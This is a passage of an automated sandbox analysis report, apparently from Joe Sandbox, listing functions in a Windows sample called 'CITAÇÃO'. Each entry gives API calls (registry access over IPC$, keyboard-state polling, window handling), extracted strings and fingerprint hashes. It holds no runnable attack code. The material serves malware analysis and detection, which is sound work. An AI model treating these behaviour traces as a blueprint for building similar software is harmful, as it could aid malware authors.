                                                      • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                      • String ID:
                                                      • API String ID: 3218148540-0
                                                      • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                      • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                      • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                      • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                      Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                      • String ID:
                                                      • API String ID: 136442275-0
                                                      • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                      • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                      • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                      • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                      Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcsncpy.LIBCMT ref: 00467490
                                                      • _wcsncpy.LIBCMT ref: 004674BC
                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                      • _wcstok.LIBCMT ref: 004674FF
                                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                      • _wcstok.LIBCMT ref: 004675B2
                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                      • _wcslen.LIBCMT ref: 00467793
                                                      • _wcscpy.LIBCMT ref: 00467641
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • _wcslen.LIBCMT ref: 004677BD
                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                      • String ID: X
                                                      • API String ID: 3104067586-3081909835
                                                      • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                      • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                      • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                      • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                      Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                      • _wcslen.LIBCMT ref: 004610A3
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                      • GetWindowRect.USER32(?,?), ref: 00461248
                                                        • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                      • String ID: ThumbnailClass
                                                      • API String ID: 4136854206-1241985126
                                                      • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                      • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                      • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                      • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                      Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                      • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                      • GetClientRect.USER32(?,?), ref: 00471A1A
                                                      • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                      • String ID: 2
                                                      • API String ID: 1331449709-450215437
                                                      • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                      • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                      • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                      • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                      Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                      • __swprintf.LIBCMT ref: 00460915
                                                      • __swprintf.LIBCMT ref: 0046092D
                                                      • _wprintf.LIBCMT ref: 004609E1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                      • API String ID: 3054410614-2561132961
                                                      • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                      • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                      • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                      • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                      Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                      • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                      • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                      • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 600699880-22481851
                                                      • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                      • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                      • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                      • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                      Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: DestroyWindow
                                                      • String ID: static
                                                      • API String ID: 3375834691-2160076837
                                                      • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                      • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                      • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                      • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                      Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                      • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                      • API String ID: 2907320926-3566645568
                                                      • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                      • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                      • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                      • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                      Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                      • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                      • DeleteObject.GDI32(E2D55EB8), ref: 00470A04
                                                      • DestroyIcon.USER32(080082AC), ref: 00470A1C
                                                      • DeleteObject.GDI32(00A61C40), ref: 00470A34
                                                      • DestroyWindow.USER32(00A66988), ref: 00470A4C
                                                      • DestroyIcon.USER32(?), ref: 00470A73
                                                      • DestroyIcon.USER32(?), ref: 00470A81
                                                      • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 1237572874-0
                                                      • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                      • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                      • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                      • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                      Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                      • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                      • VariantInit.OLEAUT32(?), ref: 004793E1
                                                      • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                      • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                      • VariantClear.OLEAUT32(?), ref: 00479489
                                                      • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                      • VariantClear.OLEAUT32(?), ref: 004794CA
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                      • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                      • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                      • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                      Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 0044480E
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                      • GetKeyState.USER32(000000A0), ref: 004448AA
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                      • GetKeyState.USER32(000000A1), ref: 004448D9
                                                      • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                      • GetKeyState.USER32(00000011), ref: 00444903
                                                      • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                      • GetKeyState.USER32(00000012), ref: 0044492D
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                      • GetKeyState.USER32(0000005B), ref: 00444958
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                      • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                      • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                      • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                      Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                      • String ID:
                                                      • API String ID: 3413494760-0
                                                      • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                      • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                      • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                      • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                      Function 0044EDCC Relevance: 16.2, APIs: 3, Strings: 6, Instructions: 472COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
